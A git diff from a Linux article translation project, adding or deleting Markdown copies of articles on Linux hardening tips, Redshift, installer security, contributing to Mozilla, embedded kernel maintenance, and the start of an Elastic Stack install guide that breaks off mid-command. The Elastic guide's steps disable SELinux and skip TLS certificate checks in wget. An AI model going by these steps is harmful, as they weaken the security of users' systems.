-[13]:http://mirrors.linuxeye.com/hhvm-repo/7/x86_64/ -[14]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/4.png -[15]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/5.png -[16]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/6.png -[17]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/7.png -[18]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/8.png -[19]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/9.png -[20]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/10.png -[21]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/11.png -[22]:https://www.howtoforge.com/images/how-to-install-wordpress-with-hhvm-and-nginx-on-centos-7/big/12.png diff --git a/sources/tech/20170117 How to Keep Hackers out of Your Linux Machine Part 2: Three More Easy Security Tips.md b/sources/tech/20170117 How to Keep Hackers out of Your Linux Machine Part 2: Three More Easy Security Tips.md new file mode 100644 index 0000000000..6774045d81 --- /dev/null +++ b/sources/tech/20170117 How to Keep Hackers out of Your Linux Machine Part 2: Three More Easy Security Tips.md @@ -0,0 +1,70 @@ +How to Keep Hackers out of Your Linux Machine Part 2: Three More Easy Security Tips +============================================================ + + + ![security tips](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-tips.jpg?itok=JMp34oc3 "security tips") +In this series, we’ll cover essential information for keeping hackers out of your system. Watch the free webinar on-demand for more information.[Creative Commons Zero][1]Pixabay + +In [part 1][3] of this series, I shared two easy ways to prevent hackers from eating your Linux machine. Here are three more tips from my recent Linux Foundation webinar where I shared more tactics, tools and methods hackers use to invade your space. Watch the entire [webinar on-demand][4] for free. + +### Easy Linux Security Tip #3 + +**Sudo.** + +Sudo is really, really important. I realize this is just really basic stuff but these basic things make my life as a hacker so much more difficult. If you don't have it configured, configure it. + +Also, all your users must use their password. Don't all “sudo all” with no password. That doesn't do anything other than make my life easy when I have a user that has “sudo all” with no password. If I can “sudo ” and hit you without having to authenticate again and I have your SSH key with no passphrase, that makes it pretty easy to get around. I now have root on your machine. + +Keep the timeout low. We like to hijack sessions, and if you have a user that has Sudo and the timeout is three hours and I hijack your session, then you've given me a free pass again even though you require a password. + +I recommend a timeout of about 10 minutes, or even 5 minutes. They’ll enter their password over and over again but if you keep the timeout low, then you reduce your attack surface. + +Also limit the available commands and don't allow shell access with sudo. Most default distributions right now will allow you to do “sudo bash” and get a root shell, which is great if you are doing massive amounts of admin tasks. However, most users should have a limited amount of commands that they need to actually run. The more you limit them, the smaller your attack surface. If you give me shell access I am going to be able to do all kinds of stuff. + +### Easy Linux Security Tip #4 + +**Limit running services.** + +Firewalls are great. Your perimeter firewall is awesome. There are several manufacturers out there that do a fantastic job when the traffic comes across your network. But what about the people on the inside? + +Are you using a host-based firewall or host-based intrusion detection system? If so, configure it right. How do you know if something goes wrong that you are still protected? + +The answer is to limit the services that are currently running. Don't run mySQL on a machine that doesn't need it. If you have a distribution that installs a full LAMP stack by default and you're not running anything on top of it, then uninstall it. Disable those services and don't start them. + +And make sure users don't have default credentials. Make sure that those contents are configured securely. If you are running Tomcat, you are not allowed to upload your own applets. Make sure they don't run as root. If I am able to run an applet, I don't want to be able to run an applet as root and give myself access. The more you can restrict the amount of things that people can do the better off it is going to be. + +### Easy Linux Security Tip #5 + +**Watch your logs.** + +Look at them. Seriously. Watch your logs. We ran into an issue six months ago where one of our customers wasn't looking at their logs and they have been owned for a very, very long time. Had they been watching it, they would have been able to tell that their machines have been compromised and their whole network was wide open. I do this at home. I have a regimen every morning. I get up, I check my email. I go through my logs, and it takes me 15 minutes but it tells me a wealth of information about what's going on. + +Just this morning, I had three systems fail in the cabinet and I had to go and reboot them, and I have no idea why but I could tell in my logs that they weren't responding. They were lab systems. I really don't care about them but other people do. + +Centralizing your logging via Syslog or Splunk or any of those logging consolidation tools is fantastic. It is better than keeping them local. My favorite thing to do is to edit your logs so you don't know that I have been there. If I can do that then you have no clue. It's much more difficult for me to modify a central set of logs than a local set. + +Just like your significant other, bring them flowers, aka, disk space. Make sure you have plenty of disk space available for logging. Going into a read-only file system is not a good thing. + +Also, know what's abnormal. It’s such a difficult thing to do but in the long run it is going to pay dividends. You’ll know what's going on and when something’s wrong. Be sure you know that. + +In the [third and final blog post][5], I’ll answer some of the excellent security questions asked during the webinar. [Watch the entire free webinar on-demand][6] now. + +_Mike Guthrie works for the Department of Energy doing Red Team engagements and penetration testing._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/webinar/2017/how-keep-hackers-out-your-linux-machine-part-2-three-more-easy-security-tips + +作者:[MIKE GUTHRIE][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/anch +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/security-tipsjpg +[3]:https://www.linux.com/news/webinar/2017/how-keep-hackers-out-your-linux-machine-part-1-top-two-security-tips +[4]:http://portal.on24.com/view/channel/index.html?showId=1101876&showCode=linux&partnerref=linco +[5]:https://www.linux.com/news/webinar/2017/how-keep-hackers-out-your-linux-machine-part-3-your-questions-answered +[6]:http://bit.ly/2j89ISJ diff --git a/sources/tech/20170118 Improve your sleep by using Redshift on Fedora.md b/sources/tech/20170118 Improve your sleep by using Redshift on Fedora.md deleted file mode 100644 index 8d3cf4cd63..0000000000 --- a/sources/tech/20170118 Improve your sleep by using Redshift on Fedora.md +++ /dev/null @@ -1,88 +0,0 @@ -[Improve your sleep by using Redshift on Fedora][1] -=============================================== - - ![redshift](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/redshift-945x400.png) - -The blue light emitted by most electronic devices, is known for having a negative impact on our sleep. We could simply quit using each of our electronic devices after dark, as an attempt to improve our sleep. However, since that is not really convenient for most of us, a better way is to adjusts the color temperature of your screen according to your surroundings. One of the most popular ways to achieve this is with the Redshift utility. Jon Lund Steffensen , the creator of Redshift, describes his program in the following way: - -> Redshift adjusts the color temperature of your screen according to your surroundings. This may help your eyes hurt less if you are working in front of the screen at night. - -The Redshift utility only works in the X11 session on Fedora Workstation. So if you’re using Fedora 24, Redshift will work with the default login session. However, on Fedora 25, the default session at login is Wayland, so you will have to use the GNOME shell extension instead. Note, too that the GNOME Shell extension also works with X11 sessions. - -### **Redshift utility** - -#### Installation - -Redshift is in the Fedora’s repos, and thus, all we have to do to install is run this command: - -``` -sudo dnf install redshift -``` - -The package also provides a GUI. To use this, install `redshift-gtk` instead. Remember, though, that the utility only works on X11 sessions. - -#### Using the Redshift utility - -Run the utility from the command line with a command like the following: - -``` -redshift -l 23.6980:133.8807 -t 5600:3400 -``` - -In the above command, the_ -l 23.6980:133.8807 _means we are informing Redshift that our current location is 23.6980° S, 133.8807° E. The_ -t 5600:3400_ declares that during the day you want a colour temperature of 5600, and 3400 at night. - -The temperature is proportional to the amount of blue light emitted: a lower temperature, implies a lower amount of blue light.  I prefer to use 5600K (6500K is neutral daylight) during the day, and 3400K at night (anything lower makes me feel like I’m staring at a tomato), but feel free to experiment with it. - -If you don’t specify a location, Redshift attempts to use the Geoclue method in order to determine your location coordinates. If this method doesn’t work, you could use multiple [websites][2] and online maps to find the coordinates. - - ![screenshot1](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/screenshot1.png) - -Don’t forget to set Redshift as an autostart command, and to check [Jon’s website][3] for more information. - -### Redshift GNOME Shell extension - -The utility does not work when running the Wayland display server (which is standard in Fedora 25). Fortunately, there is a handy GNOME Shell extension that will do the same job. To install, run the the following commands`:` - -``` -sudo dnf copr enable mystro256/gnome-redshift -sudo dnf install gnome-shell-extension-redshift -``` - -After installing from the COPR repo, log out and log back in of your Fedora Workstation, then enable it in the GNOME Tweak tool. For more information, check the gnome-redshift [copr repo][4], or the [github repo][5]. - -After enabling the extension, a little sun (or moon) icon appears in the top right of your GNOME shell. The extension also provides a settings dialog to tweak the times of the redshift and the temperature. - - ![screenshot-from-2017-01-18-15-21-47](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/Screenshot-from-2017-01-18-15-21-47.jpg) - -### Relative software - -#### F.lux - -Redshift could be seen as the open-source variant of F.lux. There is a [linux version of F.lux][6] now. You could consider using it if you don’t mind using closed-source software, or if Redshift doesn’t work properly. - -#### Twilight for Android - -Twilight is similar to Redshift, but for Android. It makes reading on your smartphone or tablet late at night more comfortable. - -#### Redshift plasmoid - -This is the Redshift GUI version for KDE. You can find more information on [github][7]. - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/safe-eyes-redshift/ - -作者:[novel][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://novel.id.fedoraproject.org/ -[1]:https://fedoramagazine.org/safe-eyes-redshift/ -[2]:http://www.latlong.net/ -[3]:http://jonls.dk/redshift/ -[4]:https://copr.fedorainfracloud.org/coprs/mystro256/gnome-redshift/ -[5]:https://github.com/benzea/gnome-shell-extension-redshift -[6]:https://justgetflux.com/linux.html -[7]:https://github.com/simgunz/redshift-plasmoid diff --git a/sources/tech/20170118 Why Linux Installers Need to Add Security Features.md b/sources/tech/20170118 Why Linux Installers Need to Add Security Features.md deleted file mode 100644 index 1f42f2c8a5..0000000000 --- a/sources/tech/20170118 Why Linux Installers Need to Add Security Features.md +++ /dev/null @@ -1,71 +0,0 @@ -Why Linux Installers Need to Add Security Features -============================================================ - ->_With the heightened security concerns, Linux distros need to make basic security options prominently available in their installers rather than options that users can add manually later._ - -Twelve years ago, Linux distributions were struggling to make installation simple. Led by Ubuntu and Fedora, they long ago achieved that goal. Now, with the growing concerns over security, they need to reverse directions slightly, and make basic security options prominently available in their installers rather than options that users can add manually later. - -At the best of times, of course, convincing users to come anywhere near security features is difficult. Too many users are reluctant even to add features as simple as unprivileged user accounts or passwords, apparently preferring the convenience of the moment to reducing the risk of an intrusion that will require reinstallation, or a consultation with a computer expert at eighty dollars an hour. - -However, if average users are ever going to pay attention to security, it will probably be during installation. They may never think of it again for another eighteen months, but perhaps for one moment during installation when their attention is focused, they might be persuaded to select a check box, especially if visible online help explains the advantages. - -Nor is this shift such a great one. Many installers already offer the choice of automatic logins -- a feature that might be acceptable for a virtue install that contains no personal data, but is all too likely to be selected by those who find logins inconvenient. Similarly, thanks to Ubuntu, choosing to encrypt filesystems -- or at least home directories -- has already become standard in many installers. All I am really suggesting is more of the same. - -Moreover, outside installers, Firefox has merged Private Browsing seamlessly into user choices, and [Signal Private Messenger][8] is a drop-in replacement for standard Android Phone and Contact apps. - -The suggestion, then, is far from radical. It simply requires the will and the imagination to implement it. - -### Linux Security First Steps - -What sort of security features should be added to installers? - -To start with, a firewall. Dozens of graphical interfaces are available for setting up firewalls, but to paraphrase Byron talking about Coleridge's metaphysical speculations, despite seventeen years of experience, I sometimes wish someone would explain their explanations. - -Despite being well-intentioned, most of these firewall tools make dealing directly with iptables seem straightforward. [Bastille Linux][9], the now-defunct system hardener, used to install a basic firewall, and I see no reason why other distributions could not do the same. - -Other tools already exist for post-installation use, and could be added without much difficulty in an installer. For instance, [Grub 2][10], the boot manager used by most distribution includes basic password protection. Admittedly, the password can be bypassed by booting from a Live CD, but it still provides a certain amount of protection in everyday circumstances, including remote log ins. - -Similarly, a post-install password enforcer like [pwgen][11] could be added to the section of the installer for setting up accounts. These tools enforce the length of acceptable passwords, and their combination of upper and lower case letters, numbers, and special characters. Many generate a password for you, some even making it pronouncable for help in remembering. - -Still other tools could be added as part of the installation. For example, an installer could ask for a schedule for regular backups, and add a cronjob and a simple backup tool like [kbackup][12]. - -And what about encrypted email? Most popular email readers today include the capacity for encrypted email, but setting up and using encryption require extra steps to be taken by the users, complicating common tasks to the point that the temptation to ignore them is almost irresistible. Yet seeing how simple Signal makes encryption on phones, it is obvious that much more can be done to make encryption easier on laptops and workstations as well. Probably, most distributions would prefer peer to peer encryption rather than Signal's centralized servers, but applications like [Ring][13] could provide that feature. - -Whatever features are added to the installer, perhaps the precautions could also be extended to productivity software such as LibreOffice. Most efforts at security focus on email, web browsing, and chat, yet word processors and spreadsheets, with their macro languages, are an obvious source of malware infection, and a privacy concern as well. Yet aside from a few outliers like [Qubes OS][14] or [Subgraph][15], few make any effort to include productivity software in their security precautions -- a lapse that potentially leaves a gaping security hole. - -### Modern Adaptations - -Of course, users who take such matters seriously will probably settle on a security-conscious approach. However, such users can be trust to take care of themselves. - -What I am concerned about here are users who are less knowledgeable or less inclined to do their own tinkering. Easy to use security is a growing need, and overdue to be addressed. - -The examples here are simply places to start. Most of them already exist, and the need is to implement them in such a way that users cannot ignore them, and can use them with a minimum of knowledge. Probably, implementing all of them would require no more than a month's work by a single coder, including prototyping,UI design, and testing. - -Yet, until such features are added, most major Linux distributions can hardly be said to be concerned about security at all. After all, what good are tools if users never use them? - --------------------------------------------------------------------------------- - -via: http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html - -作者:[Bruce Byfield][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.datamation.com/author/Bruce-Byfield-6030.html -[1]:http://www.datamation.com/feedback/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html -[2]:http://www.datamation.com/author/Bruce-Byfield-6030.html -[3]:http://www.datamation.com/e-mail/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html -[4]:http://www.datamation.com/print/http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html -[5]:http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html#comment_form -[6]:http://www.datamation.com/security/why-linux-installers-need-to-add-security-features.html# -[7]:http://www.datamation.com/author/Bruce-Byfield-6030.html -[8]:https://whispersystems.org/ -[9]:http://bastille-linux.sourceforge.net/ -[10]:https://help.ubuntu.com/community/Grub2/Passwords -[11]:http://pwgen-win.sourceforge.net/downloads.html -[12]:http://kbackup.sourceforge.net/ -[13]:https://savannah.gnu.org/projects/ring/ -[14]:https://www.qubes-os.org/ -[15]:https://subgraph.com/sgos/ diff --git a/sources/tech/20170119 How to get started contributing to Mozilla.md b/sources/tech/20170119 How to get started contributing to Mozilla.md deleted file mode 100644 index 9ca6889b97..0000000000 --- a/sources/tech/20170119 How to get started contributing to Mozilla.md +++ /dev/null @@ -1,126 +0,0 @@ -How to get started contributing to Mozilla -============================================================ - ![How to get started contributing to Mozilla](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/rh_003588_01_rd3os.combacktoschoolserieshe_rh_041x_0.png?itok=yUgHEdMK "How to get started contributing to Mozilla") -Image by :  - -opensource.com - -_The journey of a thousand miles begins with one step. —Lao Tzu_ - -Open source participation offers a sea of benefits that can fine-tune and speed up your career in the tech, including but not limited to real-world technical experience and expanding your professional network. There are a lot of open source projects out there you can contribute to—of small, medium, and large size, as well as unknown and popular. In this article we'll focus on how to contribute to one of the largest and most popular open source projects on the web: Mozilla. - -### Why contribute to Mozilla? - -### Real world experience - -Mozilla is one of the largest open source projects on the web and is itself a host to many other open source projects. So, when you contribute to large-scale open source projects like Mozilla, you gain real-world exposure to how things really work in the tech field, increased knowledge of technical jargon and complex system functionalities, and most importantly, an understanding of how to take code from a local system to a live code repository. You'll learn many of the tools and techniques contributors are using to manage these large-scale projects, like GitHub, Docker, Bugzilla, etc. - -### Community connections - -Community is the heart of any open source project. Contributing to Mozilla connects you with official Mozilla staff and mentors, senior Mozilla contributors (aka Mozillians), and your own local Mozilla community. These are like-minded people who care and strive for improving open source like you do. - -Also, you'll have a chance to build your own identity in the Mozilla community and to inspire other fellow Mozillians. If you want to, you can also eventually mentor others. - -### Events and swag - -No community is complete without a few fun-filled events and bags of swag. Mozilla is no exception. - -Contributing to Mozilla will give you a chance to take part in exclusive Mozilla events. And once you've become a seasoned Mozilla contributor, you'll be able to host your own local Mozilla community events (and Mozilla may assist with funding). Plus, of course, some cool swag—stickers, T-shirts, mugs, and more. - - ![India Mozilla meetup 2016](https://opensource.com/sites/default/files/mozilla-india-meetup-2016.jpg "India Mozilla meetup 2016") - -CC BY-SA 4.0 Mozilla India Meetup 2016 by Moin Shaikh - -### How to contribute to Mozilla - -Whether you are a programmer, web designer, QA tester, translator, or something in-between, there are many different ways you can contribute to Mozilla. Let's view it in two main parts: technical contribution and nontechnical contribution. - - ![Ways to contribute](https://opensource.com/sites/default/files/ways-to-contribute-mozilla_0.jpg "Ways to contribute") - -CC BY-SA 3.0 by [Mozilla.org][1] - -### Technical contribution - -Technical contribution is for people who love programming and who want to make an impact with their code. There are a number of projects built in specific programming languages where you can hone your talents: - -* If love C++, you can contribute to the core layers of Firefox and other Mozilla products. -* If you know JavaScript, HTML, and CSS, you can contribute to the front-end of Firefox. -* If you know Java, you can contribute to Firefox Mobile, Firefox on Android, and MozStumbler. -* If you know Python, you can contribute to web services, including Firefox Sync or Firefox Accounts. -* If you know Shell, Make, Perl, or Python, you can contribute to Mozilla's build systems and release engineering and automation. -* If you know C language, you can contribute to NSS, Opus, and Daala projects. -* If you know Rust language, you can contribute to RustC, Servo (a web browser engine designed for parallelism and safety), or Quantum (a project to bring large pieces of Servo into Gecko). -* If you know Go language, you can contribute to Heka, a tool for data processing. - -To learn more, visit the [Getting Started][3] section on the Mozilla Developer Network (MDN) to take a look at various contributions areas. - -Apart from languages and code, you can also contribute with your QA and testing skills by actively testing various parts of Firefox web browser, Firefox Android browser, and Mozilla's many web properties, such as Firefox add-ons, etc. - -### Nontechnical contribution - -You can also make nontechnical contributions to Mozilla, focusing on areas like QA testing, document translation, UX/UI design, web literacy, open source advocacy, and providing user support to Mozilla Firefox and Thunderbird users. - -**QA testing:** The Mozilla QA team has a large and vibrant community around the world that is deeply involved in the workings of Firefox and other Mozilla projects. The QA contributors take an early look at various products, explore new features, file bugs, triage existing bugs, write and execute test cases, automate tests, and provide valuable feedback from a usability perspective. To get started or to learn more about the Mozilla QA community resources, visit the [Mozilla QA community][4] website. - -**UX design:** If you're a creative designer or a passionate geek who loves to play with colors and graphics, Mozilla has a lot of space for you in its community where you can design usable, accessible, delightful Mozilla projects. Check out this [Open Design repository][5] on Mozilla's GitHub page. - -**User support (forum and social support):** This is where hundreds of thousands of Firefox and Thunderbird users like you and me come and post questions about Firefox and Thunderbird, and this is where they get answers from Mozilla contributors like us. This requires no coding genius, no design skills, and no testing abilities, only handful of Firefox knowledge to get started as a Firefox User Support contributor. Check out this [Get Involved][6] section to join User Support at [SUMO][7]. Support is probably the easiest yet most important areas to commence your Mozilla journey. (Note: Three years ago, I began my Mozilla journey at the Social Support forums.) - -**Writing knowledgebase and help articles:** If you like writing and teaching, then the Knowledge Base is the place for you. Mozilla is always looking for contributors who can write, edit, or proofread articles in English for Firefox and other products. Thousands of users surf these knowledgebase articles every week, and you can make a robust impact by sharing your wisdom and writing help articles for them. Visit the [Mozilla Knowledge Base][8] site to get involved. - -**Localization, aka l10n:** Mozilla's products, like Firefox, are used by millions around the globe and by those speaking many different languages. People need these products in their own language. Language localization is an area that is very much in need of contributors. Projects requiring your translation and localization skills include: - -* Mozilla products, such as Firefox -* Mozilla websites and services -* Mozilla marketing campaigns -* SUMO product support documentation -* MDN developer documentation - -You can visit [Mozilla's l10n][9] site to get involved. - -**Teaching and web literacy:** One of the fundamental mission objectives of Mozilla is to keep the web accessible to all. To achieve this mission objective, Mozilla strives hard to educate and enable web users by providing them with the tools and technologies of web literacy. This is where you can help with your teaching skills. If you are a passionate teacher who loves to share knowledge and show the masses all about the Internet, take a look at [Teach the Web][10] initiative by Mozilla. Teach your local community, school kids, your friends, and others about the Internet and web literacy. - -**Advocacy:** If you are passionate about Mozilla's mission, you can spread the word by advocating for the Mozilla mission. While advocating for Mozilla's mission, you can contribute by: - -* Tackling public policy and fight for an open internet and user privacy -* Helping the web be more interoperable by working with site owners on compatibility -* Helping web authors improve how they write about the open web -* Showing your Mozilla and Firefox pride as [Firefox Friends][2] - -To begin promoting Mozilla's mission, take a look at the [Mozilla Advocacy][11] page. - -### If you're lost, I'm here to help you get started! - -I know that as a novice contributor, this article might be an overwhelming amount of information for you. If you need further directions, resources, or references, you can ask me in the comments below or you can [ping me on Twitter][12]. I would be very happy to help you get started with your first contribution (of many more!) to Mozilla. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/15492097_10205888026638370_7707367819712084708_n.jpg?itok=3R90PGkv) - - I am an open source tech geek working as a web analyst and have combined IT experience of over 7 years. I have been contributing to Mozilla for over 2 years. I mainly contribute to: Firefox Web QA, Firefox Technical Support, Localization and community mentoring. Apart from open source contribution, I read, write and speak about UX, Material Design and eCommerce Analysis. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/how-get-started-contributing-mozilla - -作者:[Moin Shaikh][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/moinshaikh -[1]:http://mozilla.org/ -[2]:https://www.mozilla.org/en-US/contribute/friends/ -[3]:https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Introduction#Find_a_bug_we've_identified_as_a_good_fit_for_new_contributors. -[4]:https://quality.mozilla.org/get-involved/ -[5]:https://github.com/mozilla/OpenDesign -[6]:https://support.mozilla.org/en-US/get-involved/questions -[7]:http://support.mozilla.org/ -[8]:https://support.mozilla.org/en-US/get-involved/kb -[9]:https://l10n.mozilla.org/ -[10]:https://learning.mozilla.org/en-US/ -[11]:https://advocacy.mozilla.org/en-US -[12]:https://twitter.com/moingshaikh diff --git a/sources/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md b/sources/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md deleted file mode 100644 index 380cb87d42..0000000000 --- a/sources/tech/20170119 Long-term Embedded Linux Maintenance Made Easier.md +++ /dev/null @@ -1,53 +0,0 @@ -Long-term Embedded Linux Maintenance Made Easier -============================================================ - - ![Jan Lübbe ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/jan-lubbe-elc.png?itok=6G5lADKu "Jan Lübbe ") -Pengutronix kernel hacker Jan Lübbe summarized growing security threats in embedded Linux and outlined a plan to keep long-life devices secure and fully functional in this talk from Embedded Linux Conference Europe.[The Linux Foundation][1] - -The good old days when security breaches only happened to Windows folk are fading fast. Malware hackers and denial of service specialists are increasingly targeting out of date embedded Linux devices, and fixing Linux security vulnerabilities was the topic of several presentations at the [Embedded Linux Conference Europe ][3](ELCE) in October. - -One of the best attended was “Long-Term Maintenance, or How to (Mis-)Manage Embedded Systems for 10+ Years” by [Pengutronix][4] kernel hacker Jan Lübbe. After summarizing the growing security threats in embedded Linux, Lübbe laid out a plan to keep long-life devices secure and fully functional. “We need to move to newer, more stable kernels and do continuous maintenance to fix critical vulnerabilities,” said Lübbe. “We need to do the upstreaming and automate processes, and put in place a sustainable workflow. We don’t have any more excuses for leaving systems in the field with outdated software.” - -As Linux devices grow older, traditional lifecycle procedures are no longer up to the job. “Typically, you would take a kernel from a SoC vendor or mainline, take a build system, and add user space,” said Lübbe. “You customize that and add an application, and do some testing and you’re done. But then there’s a maintenance phase for 15 years, and you better hope you have no platform changes, or want to add new features, or need to apply regulatory changes.” - -All these changes increasingly expose your system to new errors, and require massive updates to keep in sync with upstream software. “But it’s not always unintentional errors that occur in the kernel that lead to problems,” said Lübbe. “These vendor kernels never went through the mainline community review process,” he added, noting the [backdoor][5] found last year in an Allwinner kernel. - -“You cannot trust that your vendor will do the correct thing,” continued Lübbe. “Maybe only one or two engineers looked at that backdoor code. That would never happen if the patch was posted on a Linux kernel mailing list. Somebody would notice. Hardware vendors don’t care about security or maintenance. Maybe you get an update after one or two years, but even then it usually takes years between the time they start developing based on one fixed version to the point they declare it stable. If you then start developing on that base, you add maybe another half a year, and it’s even more obsolete.” - -Increasingly, embedded developers working with long-life products build on Long Term Stable (LTS) kernels. But that doesn’t mean your work is done. “After a product is released, people don’t often follow the stable release chain anymore, so they don’t apply the security patches,” said Lübbe. “You’re getting the worst of both worlds: an obsolete kernel and no security. You don’t get the benefit of testing by many people.” - -Lübbe noted that Pengutronix customers that used server-oriented distributions like Red Hat often ran into problems due to the rapid rate of customizations, as well as deployment and update systems that assume a sysadmin is on duty. - -“The updates can work for some things, especially if they are x86, but each project is basically on its own to build infrastructure to update to new releases.” - -Many developers choose backporting as a solution for updating long-life products. “It’s easy in the beginning, but once you are no longer in the project's maintenance window, they don’t tell you if the version you use is affected by a bug, so it becomes much more difficult to find out if a fix is relevant,” said Lübbe. “So you pile up patches and changes and the bugs accumulate, and you have to maintain them yourself because no one else is using those patches. The benefits of using open source software are lost.” - -### Follow Upstream Projects - -The best solution, argues Lübbe, is to follow releases maintained by upstream projects. “We’ve mostly focused on mainline based development, so we have as little difference as possible between the product and the mainstream kernel and other upstream projects. Long-term systems are well supported in mainline. Most systems that don’t use 3D graphics can run very few patches. Newer kernel versions also have lots of [new hardening features][6] that reduce the impact of vulnerabilities.” - -Following mainline seems daunting to many developers, but it’s relatively easy if you implement procedures from the start, and then stick to them, said Lübbe. “You need to develop processes for everything you do on the system,” he said. “You always need to know what software is running, which is easier when you use a good build system. Each software release should define the complete system so you can update everything in the field. If you don’t know what’s there, you can’t fix it. You also want to have automated testing and automated deployment of updates.” - -To “save an update cycle,” Lübbe recommends using the most recent Linux kernel when you start developing, and only moving to a stable kernel when you enter testing. After that, he suggests updating all the software in the system, including kernel, build system, user space, glibc, and components like OpenSSL every year, to versions that are supported by the upstream projects for the rest of the year. - -“Just because you update at that point doesn’t mean you need to deploy,” said Lübbe. “If you see no security vulnerabilities, you can just put the patch on the shelf and have it ready if you need it.” - -Finally, Lübbe recommends looking at release announcements every month, and checking out security announcements on CVE and mainline lists every week. You only need to respond “if the security announcement actually affects you,” he added. “If your kernel is current enough, it’s not too much work. You don’t want to get feedback on your product by seeing your device in the news.” - --------------------------------------------------------------------------------- - -via: https://www.linux.com/news/event/ELCE/2017/long-term-embedded-linux-maintenance-made-easier - -作者:[ERIC BROWN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/ericstephenbrown -[1]:https://www.linux.com/licenses/category/linux-foundation -[2]:https://www.linux.com/files/images/jan-lubbe-elcpng -[3]:http://events.linuxfoundation.org/events/archive/2016/embedded-linux-conference-europe -[4]:http://www.pengutronix.de/index_en.html -[5]:http://arstechnica.com/security/2016/05/chinese-arm-vendor-left-developer-backdoor-in-kernel-for-android-pi-devices/ -[6]:https://www.linux.com/news/event/ELCE/2017hardening-kernel-protect-against-attackers diff --git a/sources/tech/20170120 How to Install Elastic Stack on CentOS 7.md b/sources/tech/20170120 How to Install Elastic Stack on CentOS 7.md new file mode 100644 index 0000000000..89704e593d --- /dev/null +++ b/sources/tech/20170120 How to Install Elastic Stack on CentOS 7.md @@ -0,0 +1,562 @@ +How to Install Elastic Stack on CentOS 7 +============================================================ + +### On this page + +1. [Step 1 - Prepare the Operating System][1] +2. [Step 2 - Install Java][2] +3. [Step 3 - Install and Configure Elasticsearch][3] +4. [Step 4 - Install and Configure Kibana with Nginx][4] +5. [Step 5 - Install and Configure Logstash][5] +6. [Step 6 - Install and Configure Filebeat on the CentOS Client][6] +7. [Step 7 - Install and Configure Filebeat on the Ubuntu Client][7] +8. [Step 8 - Testing][8] +9. [Reference][9] + +**Elasticsearch** is an open source search engine based on Lucene, developed in Java. It provides a distributed and multitenant full-text search engine with an HTTP Dashboard web-interface (Kibana). The data is queried, retrieved and stored with a JSON document scheme. Elasticsearch is a scalable search engine that can be used to search for all kind of text documents, including log files. Elasticsearch is the heart of the 'Elastic Stack' or ELK Stack. + +**Logstash** is an open source tool for managing events and logs. It provides real-time pipelining for data collections. Logstash will collect your log data, convert the data into JSON documents, and store them in Elasticsearch. + +**Kibana** is an open source data visualization tool for Elasticsearch. Kibana provides a pretty dashboard web interface. It allows you to manage and visualize data from Elasticsearch. It's not just beautiful, but also powerful. + +In this tutorial, I will show you how to install and configure Elastic Stack on a CentOS 7 server for monitoring server logs. Then I'll show you how to install 'Elastic beats' on a CentOS 7 and a Ubuntu 16 client operating system. + +**Prerequisite** + +* CentOS 7 64 bit with 4GB of RAM - elk-master +* CentOS 7 64 bit with 1 GB of RAM - client1 +* Ubuntu 16 64 bit with 1GB of RAM - client2 + +### Step 1 - Prepare the Operating System + +In this tutorial, we will disable SELinux on the CentOS 7 server. Edit the SELinux configuration file. + +vim /etc/sysconfig/selinux + +Change SELINUX value from enforcing to disabled. + +SELINUX=disabled + +Then reboot the server. + +reboot + +Login to the server again and check the SELinux state. + +getenforce + +Make sure the result is disabled. + +### Step 2 - Install Java + +Java is required for the Elastic stack deployment. Elasticsearch requires Java 8, it is recommended to use the Oracle JDK 1.8\. I will install Java 8 from the official Oracle rpm package. + +Download Java 8 JDK with the wget command. + +wget --no-cookies --no-check-certificate --header "Cookie: 